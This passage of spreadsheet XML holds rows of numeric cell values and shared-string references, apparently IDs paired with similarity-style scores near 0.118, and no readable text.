      <c r="B20368" s="2">
        <v>2.3973834E7</v>
      </c>
      <c r="C20368" s="2" t="s">
        <v>19645</v>
      </c>
      <c r="D20368" s="2">
        <v>1.0</v>
      </c>
      <c r="E20368" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20368" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20369" ht="15.75" customHeight="1">
      <c r="A20369" s="1">
        <v>12381.0</v>
      </c>
      <c r="B20369" s="2">
        <v>2.8831168E7</v>
      </c>
      <c r="C20369" s="2" t="s">
        <v>19646</v>
      </c>
      <c r="D20369" s="2">
        <v>1.0</v>
      </c>
      <c r="E20369" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20369" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20370" ht="15.75" customHeight="1">
      <c r="A20370" s="1">
        <v>14574.0</v>
      </c>
      <c r="B20370" s="2">
        <v>4.0078014E7</v>
      </c>
      <c r="C20370" s="2" t="s">
        <v>19647</v>
      </c>
      <c r="D20370" s="2">
        <v>1.0</v>
      </c>
      <c r="E20370" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20370" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20371" ht="15.75" customHeight="1">
      <c r="A20371" s="1">
        <v>15083.0</v>
      </c>
      <c r="B20371" s="2">
        <v>4.1768606E7</v>
      </c>
      <c r="C20371" s="2" t="s">
        <v>19648</v>
      </c>
      <c r="D20371" s="2">
        <v>1.0</v>
      </c>
      <c r="E20371" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20371" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20372" ht="15.75" customHeight="1">
      <c r="A20372" s="1">
        <v>15627.0</v>
      </c>
      <c r="B20372" s="2">
        <v>4.3571536E7</v>
      </c>
      <c r="C20372" s="2" t="s">
        <v>19649</v>
      </c>
      <c r="D20372" s="2">
        <v>1.0</v>
      </c>
      <c r="E20372" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20372" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20373" ht="15.75" customHeight="1">
      <c r="A20373" s="1">
        <v>15997.0</v>
      </c>
      <c r="B20373" s="2">
        <v>4.496298E7</v>
      </c>
      <c r="C20373" s="2" t="s">
        <v>19650</v>
      </c>
      <c r="D20373" s="2">
        <v>1.0</v>
      </c>
      <c r="E20373" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20373" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20374" ht="15.75" customHeight="1">
      <c r="A20374" s="1">
        <v>17068.0</v>
      </c>
      <c r="B20374" s="2">
        <v>4.858192E7</v>
      </c>
      <c r="C20374" s="2" t="s">
        <v>19651</v>
      </c>
      <c r="D20374" s="2">
        <v>1.0</v>
      </c>
      <c r="E20374" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20374" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20375" ht="15.75" customHeight="1">
      <c r="A20375" s="1">
        <v>17481.0</v>
      </c>
      <c r="B20375" s="2">
        <v>4.9949088E7</v>
      </c>
      <c r="C20375" s="2" t="s">
        <v>19652</v>
      </c>
      <c r="D20375" s="2">
        <v>1.0</v>
      </c>
      <c r="E20375" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20375" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20376" ht="15.75" customHeight="1">
      <c r="A20376" s="1">
        <v>18234.0</v>
      </c>
      <c r="B20376" s="2">
        <v>5.2117416E7</v>
      </c>
      <c r="C20376" s="2" t="s">
        <v>19653</v>
      </c>
      <c r="D20376" s="2">
        <v>1.0</v>
      </c>
      <c r="E20376" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20376" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20377" ht="15.75" customHeight="1">
      <c r="A20377" s="1">
        <v>18840.0</v>
      </c>
      <c r="B20377" s="2">
        <v>5.396119E7</v>
      </c>
      <c r="C20377" s="2" t="s">
        <v>19654</v>
      </c>
      <c r="D20377" s="2">
        <v>1.0</v>
      </c>
      <c r="E20377" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20377" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20378" ht="15.75" customHeight="1">
      <c r="A20378" s="1">
        <v>19082.0</v>
      </c>
      <c r="B20378" s="2">
        <v>5.4643717E7</v>
      </c>
      <c r="C20378" s="2" t="s">
        <v>19655</v>
      </c>
      <c r="D20378" s="2">
        <v>1.0</v>
      </c>
      <c r="E20378" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20378" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20379" ht="15.75" customHeight="1">
      <c r="A20379" s="1">
        <v>19215.0</v>
      </c>
      <c r="B20379" s="2">
        <v>5.4995228E7</v>
      </c>
      <c r="C20379" s="2" t="s">
        <v>19656</v>
      </c>
      <c r="D20379" s="2">
        <v>1.0</v>
      </c>
      <c r="E20379" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20379" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20380" ht="15.75" customHeight="1">
      <c r="A20380" s="1">
        <v>19504.0</v>
      </c>
      <c r="B20380" s="2">
        <v>5.5916134E7</v>
      </c>
      <c r="C20380" s="2" t="s">
        <v>19657</v>
      </c>
      <c r="D20380" s="2">
        <v>1.0</v>
      </c>
      <c r="E20380" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20380" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20381" ht="15.75" customHeight="1">
      <c r="A20381" s="1">
        <v>25424.0</v>
      </c>
      <c r="B20381" s="2">
        <v>1.3801876E7</v>
      </c>
      <c r="C20381" s="2" t="s">
        <v>19658</v>
      </c>
      <c r="D20381" s="2">
        <v>1.0</v>
      </c>
      <c r="E20381" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20381" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20382" ht="15.75" customHeight="1">
      <c r="A20382" s="1">
        <v>27124.0</v>
      </c>
      <c r="B20382" s="2">
        <v>2.071688E7</v>
      </c>
      <c r="C20382" s="2" t="s">
        <v>19659</v>
      </c>
      <c r="D20382" s="2">
        <v>1.0</v>
      </c>
      <c r="E20382" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20382" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20383" ht="15.75" customHeight="1">
      <c r="A20383" s="1">
        <v>29515.0</v>
      </c>
      <c r="B20383" s="2">
        <v>3.2761921E7</v>
      </c>
      <c r="C20383" s="2" t="s">
        <v>19660</v>
      </c>
      <c r="D20383" s="2">
        <v>1.0</v>
      </c>
      <c r="E20383" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20383" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20384" ht="15.75" customHeight="1">
      <c r="A20384" s="1">
        <v>29880.0</v>
      </c>
      <c r="B20384" s="2">
        <v>3.6037735E7</v>
      </c>
      <c r="C20384" s="2" t="s">
        <v>19661</v>
      </c>
      <c r="D20384" s="2">
        <v>1.0</v>
      </c>
      <c r="E20384" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20384" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20385" ht="15.75" customHeight="1">
      <c r="A20385" s="1">
        <v>29979.0</v>
      </c>
      <c r="B20385" s="2">
        <v>3610293.0</v>
      </c>
      <c r="C20385" s="2" t="s">
        <v>19662</v>
      </c>
      <c r="D20385" s="2">
        <v>1.0</v>
      </c>
      <c r="E20385" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20385" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20386" ht="15.75" customHeight="1">
      <c r="A20386" s="1">
        <v>30315.0</v>
      </c>
      <c r="B20386" s="2">
        <v>3.8011399E7</v>
      </c>
      <c r="C20386" s="2" t="s">
        <v>19663</v>
      </c>
      <c r="D20386" s="2">
        <v>1.0</v>
      </c>
      <c r="E20386" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20386" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20387" ht="15.75" customHeight="1">
      <c r="A20387" s="1">
        <v>24310.0</v>
      </c>
      <c r="B20387" s="2">
        <v>1.0581376E7</v>
      </c>
      <c r="C20387" s="2" t="s">
        <v>19664</v>
      </c>
      <c r="D20387" s="2">
        <v>1.0</v>
      </c>
      <c r="E20387" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20387" s="2">
        <v>0.1185737976782753</v>
      </c>
    </row>
    <row r="20388" ht="15.75" customHeight="1">
      <c r="A20388" s="1">
        <v>2315.0</v>
      </c>
      <c r="B20388" s="2">
        <v>3.286149E7</v>
      </c>
      <c r="C20388" s="2" t="s">
        <v>19665</v>
      </c>
      <c r="D20388" s="2">
        <v>1.0</v>
      </c>
      <c r="E20388" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20388" s="2">
        <v>0.1184640522875817</v>
      </c>
    </row>
    <row r="20389" ht="15.75" customHeight="1">
      <c r="A20389" s="1">
        <v>16571.0</v>
      </c>
      <c r="B20389" s="2">
        <v>4.6880195E7</v>
      </c>
      <c r="C20389" s="2" t="s">
        <v>19666</v>
      </c>
      <c r="D20389" s="2">
        <v>1.0</v>
      </c>
      <c r="E20389" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20389" s="2">
        <v>0.1184640522875817</v>
      </c>
    </row>
    <row r="20390" ht="15.75" customHeight="1">
      <c r="A20390" s="1">
        <v>16102.0</v>
      </c>
      <c r="B20390" s="2">
        <v>4.5398161E7</v>
      </c>
      <c r="C20390" s="2" t="s">
        <v>19667</v>
      </c>
      <c r="D20390" s="2">
        <v>1.0</v>
      </c>
      <c r="E20390" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20390" s="2">
        <v>0.1184486373165618</v>
      </c>
    </row>
    <row r="20391" ht="15.75" customHeight="1">
      <c r="A20391" s="1">
        <v>8696.0</v>
      </c>
      <c r="B20391" s="2">
        <v>5.4429718E7</v>
      </c>
      <c r="C20391" s="2" t="s">
        <v>19668</v>
      </c>
      <c r="D20391" s="2">
        <v>1.0</v>
      </c>
      <c r="E20391" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20391" s="2">
        <v>0.1183574879227053</v>
      </c>
    </row>
    <row r="20392" ht="15.75" customHeight="1">
      <c r="A20392" s="1">
        <v>3226.0</v>
      </c>
      <c r="B20392" s="2">
        <v>3.7336919E7</v>
      </c>
      <c r="C20392" s="2" t="s">
        <v>19669</v>
      </c>
      <c r="D20392" s="2">
        <v>1.0</v>
      </c>
      <c r="E20392" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20392" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="20393" ht="15.75" customHeight="1">
      <c r="A20393" s="1">
        <v>7560.0</v>
      </c>
      <c r="B20393" s="2">
        <v>5.1547724E7</v>
      </c>
      <c r="C20393" s="2" t="s">
        <v>19670</v>
      </c>
      <c r="D20393" s="2">
        <v>1.0</v>
      </c>
      <c r="E20393" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20393" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="20394" ht="15.75" customHeight="1">
      <c r="A20394" s="1">
        <v>14824.0</v>
      </c>
      <c r="B20394" s="2">
        <v>4.0967981E7</v>
      </c>
      <c r="C20394" s="2" t="s">
        <v>19671</v>
      </c>
      <c r="D20394" s="2">
        <v>1.0</v>
      </c>
      <c r="E20394" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20394" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="20395" ht="15.75" customHeight="1">
      <c r="A20395" s="1">
        <v>17180.0</v>
      </c>
      <c r="B20395" s="2">
        <v>4.8905352E7</v>
      </c>
      <c r="C20395" s="2" t="s">
        <v>19672</v>
      </c>
      <c r="D20395" s="2">
        <v>1.0</v>
      </c>
      <c r="E20395" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20395" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="20396" ht="15.75" customHeight="1">
      <c r="A20396" s="1">
        <v>4204.0</v>
      </c>
      <c r="B20396" s="2">
        <v>4.165194E7</v>
      </c>
      <c r="C20396" s="2" t="s">
        <v>19673</v>
      </c>
      <c r="D20396" s="2">
        <v>1.0</v>
      </c>
      <c r="E20396" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20396" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="20397" ht="15.75" customHeight="1">
      <c r="A20397" s="1">
        <v>14861.0</v>
      </c>
      <c r="B20397" s="2">
        <v>4.1067558E7</v>
      </c>
      <c r="C20397" s="2" t="s">
        <v>19674</v>
      </c>
      <c r="D20397" s="2">
        <v>1.0</v>
      </c>
      <c r="E20397" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20397" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="20398" ht="15.75" customHeight="1">
      <c r="A20398" s="1">
        <v>19989.0</v>
      </c>
      <c r="B20398" s="2">
        <v>5.7630293E7</v>
      </c>
      <c r="C20398" s="2" t="s">
        <v>19675</v>
      </c>
      <c r="D20398" s="2">
        <v>1.0</v>
      </c>
      <c r="E20398" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20398" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="20399" ht="15.75" customHeight="1">
      <c r="A20399" s="1">
        <v>11325.0</v>
      </c>
      <c r="B20399" s="2">
        <v>2.1081463E7</v>
      </c>
      <c r="C20399" s="2" t="s">
        <v>19676</v>
      </c>
      <c r="D20399" s="2">
        <v>1.0</v>
      </c>
      <c r="E20399" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20399" s="2">
        <v>0.1181818181818181</v>
      </c>
    </row>
    <row r="20400" ht="15.75" customHeight="1">
      <c r="A20400" s="1">
        <v>33263.0</v>
      </c>
      <c r="B20400" s="2">
        <v>7361667.0</v>
      </c>
      <c r="C20400" s="2" t="s">
        <v>19677</v>
      </c>
      <c r="D20400" s="2">
        <v>1.0</v>
      </c>
      <c r="E20400" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20400" s="2">
        <v>0.1181818181818181</v>
      </c>
    </row>
    <row r="20401" ht="15.75" customHeight="1">
      <c r="A20401" s="1">
        <v>976.0</v>
      </c>
      <c r="B20401" s="2">
        <v>2.27745E7</v>
      </c>
      <c r="C20401" s="2" t="s">
        <v>19678</v>
      </c>
      <c r="D20401" s="2">
        <v>1.0</v>
      </c>
      <c r="E20401" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20401" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="20402" ht="15.75" customHeight="1">
      <c r="A20402" s="1">
        <v>5286.0</v>
      </c>
      <c r="B20402" s="2">
        <v>4.5192024E7</v>
      </c>
      <c r="C20402" s="2" t="s">
        <v>19679</v>
      </c>
      <c r="D20402" s="2">
        <v>1.0</v>
      </c>
      <c r="E20402" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20402" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="20403" ht="15.75" customHeight="1">
      <c r="A20403" s="1">
        <v>12114.0</v>
      </c>
      <c r="B20403" s="2">
        <v>2.6879514E7</v>
      </c>
      <c r="C20403" s="2" t="s">
        <v>19680</v>
      </c>
      <c r="D20403" s="2">
        <v>1.0</v>
      </c>
      <c r="E20403" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20403" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="20404" ht="15.75" customHeight="1">
      <c r="A20404" s="1">
        <v>15668.0</v>
      </c>
      <c r="B20404" s="2">
        <v>4.3731971E7</v>
      </c>
      <c r="C20404" s="2" t="s">
        <v>19681</v>
      </c>
      <c r="D20404" s="2">
        <v>1.0</v>
      </c>
      <c r="E20404" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20404" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="20405" ht="15.75" customHeight="1">
      <c r="A20405" s="1">
        <v>15884.0</v>
      </c>
      <c r="B20405" s="2">
        <v>4.4529625E7</v>
      </c>
      <c r="C20405" s="2" t="s">
        <v>19682</v>
      </c>
      <c r="D20405" s="2">
        <v>1.0</v>
      </c>
      <c r="E20405" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20405" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="20406" ht="15.75" customHeight="1">
      <c r="A20406" s="1">
        <v>20051.0</v>
      </c>
      <c r="B20406" s="2">
        <v>8073796.0</v>
      </c>
      <c r="C20406" s="2" t="s">
        <v>19683</v>
      </c>
      <c r="D20406" s="2">
        <v>1.0</v>
      </c>
      <c r="E20406" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20406" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="20407" ht="15.75" customHeight="1">
      <c r="A20407" s="1">
        <v>13496.0</v>
      </c>
      <c r="B20407" s="2">
        <v>3.5413766E7</v>
      </c>
      <c r="C20407" s="2" t="s">
        <v>19684</v>
      </c>
      <c r="D20407" s="2">
        <v>1.0</v>
      </c>
      <c r="E20407" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20407" s="2">
        <v>0.1180555555555555</v>
      </c>
    </row>
    <row r="20408" ht="15.75" customHeight="1">
      <c r="A20408" s="1">
        <v>23666.0</v>
      </c>
      <c r="B20408" s="2">
        <v>6866812.0</v>
      </c>
      <c r="C20408" s="2" t="s">
        <v>19685</v>
      </c>
      <c r="D20408" s="2">
        <v>1.0</v>
      </c>
      <c r="E20408" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20408" s="2">
        <v>0.1180555555555555</v>
      </c>
    </row>
    <row r="20409" ht="15.75" customHeight="1">
      <c r="A20409" s="1">
        <v>4325.0</v>
      </c>
      <c r="B20409" s="2">
        <v>4.2043502E7</v>
      </c>
      <c r="C20409" s="2" t="s">
        <v>19686</v>
      </c>
      <c r="D20409" s="2">
        <v>1.0</v>
      </c>
      <c r="E20409" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20409" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="20410" ht="15.75" customHeight="1">
      <c r="A20410" s="1">
        <v>8242.0</v>
      </c>
      <c r="B20410" s="2">
        <v>5.3362619E7</v>
      </c>
      <c r="C20410" s="2" t="s">
        <v>19687</v>
      </c>
      <c r="D20410" s="2">
        <v>1.0</v>
      </c>
      <c r="E20410" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20410" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="20411" ht="15.75" customHeight="1">
      <c r="A20411" s="1">
        <v>9013.0</v>
      </c>
      <c r="B20411" s="2">
        <v>5.4990084E7</v>
      </c>
      <c r="C20411" s="2" t="s">
        <v>19688</v>
      </c>
      <c r="D20411" s="2">
        <v>1.0</v>
      </c>
      <c r="E20411" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20411" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="20412" ht="15.75" customHeight="1">
      <c r="A20412" s="1">
        <v>12274.0</v>
      </c>
      <c r="B20412" s="2">
        <v>2.8118712E7</v>
      </c>
      <c r="C20412" s="2" t="s">
        <v>19689</v>
      </c>
      <c r="D20412" s="2">
        <v>1.0</v>
      </c>
      <c r="E20412" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20412" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="20413" ht="15.75" customHeight="1">
      <c r="A20413" s="1">
        <v>14029.0</v>
      </c>
      <c r="B20413" s="2">
        <v>3.750169E7</v>
      </c>
      <c r="C20413" s="2" t="s">
        <v>19690</v>
      </c>
      <c r="D20413" s="2">
        <v>1.0</v>
      </c>
      <c r="E20413" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20413" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="20414" ht="15.75" customHeight="1">
      <c r="A20414" s="1">
        <v>18052.0</v>
      </c>
      <c r="B20414" s="2">
        <v>5.1586239E7</v>
      </c>
      <c r="C20414" s="2" t="s">
        <v>19691</v>
      </c>
      <c r="D20414" s="2">
        <v>1.0</v>
      </c>
      <c r="E20414" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20414" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="20415" ht="15.75" customHeight="1">
      <c r="A20415" s="1">
        <v>3253.0</v>
      </c>
      <c r="B20415" s="2">
        <v>3.7389693E7</v>
      </c>
      <c r="C20415" s="2" t="s">
        <v>19692</v>
      </c>
      <c r="D20415" s="2">
        <v>1.0</v>
      </c>
      <c r="E20415" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20415" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="20416" ht="15.75" customHeight="1">
      <c r="A20416" s="1">
        <v>4166.0</v>
      </c>
      <c r="B20416" s="2">
        <v>4.1531412E7</v>
      </c>
      <c r="C20416" s="2" t="s">
        <v>19693</v>
      </c>
      <c r="D20416" s="2">
        <v>1.0</v>
      </c>
      <c r="E20416" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20416" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="20417" ht="15.75" customHeight="1">
      <c r="A20417" s="1">
        <v>4393.0</v>
      </c>
      <c r="B20417" s="2">
        <v>4.223402E7</v>
      </c>
      <c r="C20417" s="2" t="s">
        <v>19694</v>
      </c>
      <c r="D20417" s="2">
        <v>1.0</v>
      </c>
      <c r="E20417" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20417" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="20418" ht="15.75" customHeight="1">
      <c r="A20418" s="1">
        <v>6715.0</v>
      </c>
      <c r="B20418" s="2">
        <v>4.9267029E7</v>
      </c>
      <c r="C20418" s="2" t="s">
        <v>19695</v>
      </c>
      <c r="D20418" s="2">
        <v>1.0</v>
      </c>
      <c r="E20418" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20418" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="20419" ht="15.75" customHeight="1">
      <c r="A20419" s="1">
        <v>6927.0</v>
      </c>
      <c r="B20419" s="2">
        <v>4.9878604E7</v>
      </c>
      <c r="C20419" s="2" t="s">
        <v>19696</v>
      </c>
      <c r="D20419" s="2">
        <v>1.0</v>
      </c>
      <c r="E20419" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20419" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="20420" ht="15.75" customHeight="1">
      <c r="A20420" s="1">
        <v>19663.0</v>
      </c>
      <c r="B20420" s="2">
        <v>5.6366179E7</v>
      </c>
      <c r="C20420" s="2" t="s">
        <v>19697</v>
      </c>
      <c r="D20420" s="2">
        <v>1.0</v>
      </c>
      <c r="E20420" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20420" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="20421" ht="15.75" customHeight="1">
      <c r="A20421" s="1">
        <v>20377.0</v>
      </c>
      <c r="B20421" s="2">
        <v>1.1836648E7</v>
      </c>
      <c r="C20421" s="2" t="s">
        <v>19698</v>
      </c>
      <c r="D20421" s="2">
        <v>1.0</v>
      </c>
      <c r="E20421" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20421" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="20422" ht="15.75" customHeight="1">
      <c r="A20422" s="1">
        <v>32320.0</v>
      </c>
      <c r="B20422" s="2">
        <v>5575500.0</v>
      </c>
      <c r="C20422" s="2" t="s">
        <v>19699</v>
      </c>
      <c r="D20422" s="2">
        <v>1.0</v>
      </c>
      <c r="E20422" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20422" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="20423" ht="15.75" customHeight="1">
      <c r="A20423" s="1">
        <v>32568.0</v>
      </c>
      <c r="B20423" s="2">
        <v>5769097.0</v>
      </c>
      <c r="C20423" s="2" t="s">
        <v>19700</v>
      </c>
      <c r="D20423" s="2">
        <v>1.0</v>
      </c>
      <c r="E20423" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20423" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="20424" ht="15.75" customHeight="1">
      <c r="A20424" s="1">
        <v>11516.0</v>
      </c>
      <c r="B20424" s="2">
        <v>2.2313844E7</v>
      </c>
      <c r="C20424" s="2" t="s">
        <v>19701</v>
      </c>
      <c r="D20424" s="2">
        <v>1.0</v>
      </c>
      <c r="E20424" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20424" s="2">
        <v>0.1178160919540229</v>
      </c>
    </row>
    <row r="20425" ht="15.75" customHeight="1">
      <c r="A20425" s="1">
        <v>18908.0</v>
      </c>
      <c r="B20425" s="2">
        <v>5.4190551E7</v>
      </c>
      <c r="C20425" s="2" t="s">
        <v>19702</v>
      </c>
      <c r="D20425" s="2">
        <v>1.0</v>
      </c>
      <c r="E20425" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20425" s="2">
        <v>0.1178160919540229</v>
      </c>
    </row>
    <row r="20426" ht="15.75" customHeight="1">
      <c r="A20426" s="1">
        <v>8821.0</v>
      </c>
      <c r="B20426" s="2">
        <v>5.4638011E7</v>
      </c>
      <c r="C20426" s="2" t="s">
        <v>19703</v>
      </c>
      <c r="D20426" s="2">
        <v>1.0</v>
      </c>
      <c r="E20426" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20426" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="20427" ht="15.75" customHeight="1">
      <c r="A20427" s="1">
        <v>11024.0</v>
      </c>
      <c r="B20427" s="2">
        <v>1.7883689E7</v>
      </c>
      <c r="C20427" s="2" t="s">
        <v>19704</v>
      </c>
      <c r="D20427" s="2">
        <v>1.0</v>
      </c>
      <c r="E20427" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20427" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="20428" ht="15.75" customHeight="1">
      <c r="A20428" s="1">
        <v>14452.0</v>
      </c>
      <c r="B20428" s="2">
        <v>3.9390514E7</v>
      </c>
      <c r="C20428" s="2" t="s">
        <v>19705</v>
      </c>
      <c r="D20428" s="2">
        <v>1.0</v>
      </c>
      <c r="E20428" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20428" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="20429" ht="15.75" customHeight="1">
      <c r="A20429" s="1">
        <v>2150.0</v>
      </c>
      <c r="B20429" s="2">
        <v>3.1631996E7</v>
      </c>
      <c r="C20429" s="2" t="s">
        <v>19706</v>
      </c>
      <c r="D20429" s="2">
        <v>1.0</v>
      </c>
      <c r="E20429" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20429" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="20430" ht="15.75" customHeight="1">
      <c r="A20430" s="1">
        <v>3350.0</v>
      </c>
      <c r="B20430" s="2">
        <v>3.7764713E7</v>
      </c>
      <c r="C20430" s="2" t="s">
        <v>19707</v>
      </c>
      <c r="D20430" s="2">
        <v>1.0</v>
      </c>
      <c r="E20430" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20430" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="20431" ht="15.75" customHeight="1">
      <c r="A20431" s="1">
        <v>3363.0</v>
      </c>
      <c r="B20431" s="2">
        <v>3.788415E7</v>
      </c>
      <c r="C20431" s="2" t="s">
        <v>19708</v>
      </c>
      <c r="D20431" s="2">
        <v>1.0</v>
      </c>
      <c r="E20431" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20431" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="20432" ht="15.75" customHeight="1">
      <c r="A20432" s="1">
        <v>3789.0</v>
      </c>
      <c r="B20432" s="2">
        <v>3.9944054E7</v>
      </c>
      <c r="C20432" s="2" t="s">
        <v>19709</v>
      </c>
      <c r="D20432" s="2">
        <v>1.0</v>
      </c>
      <c r="E20432" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20432" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="20433" ht="15.75" customHeight="1">
      <c r="A20433" s="1">
        <v>3936.0</v>
      </c>
      <c r="B20433" s="2">
        <v>4.0595627E7</v>
      </c>
      <c r="C20433" s="2" t="s">
        <v>19710</v>
      </c>
      <c r="D20433" s="2">
        <v>1.0</v>
      </c>
      <c r="E20433" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20433" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="20434" ht="15.75" customHeight="1">
      <c r="A20434" s="1">
        <v>5006.0</v>
      </c>
      <c r="B20434" s="2">
        <v>4.4186905E7</v>
      </c>
      <c r="C20434" s="2" t="s">
        <v>19711</v>
      </c>
      <c r="D20434" s="2">
        <v>1.0</v>
      </c>
      <c r="E20434" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20434" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="20435" ht="15.75" customHeight="1">
      <c r="A20435" s="1">
        <v>17541.0</v>
      </c>
      <c r="B20435" s="2">
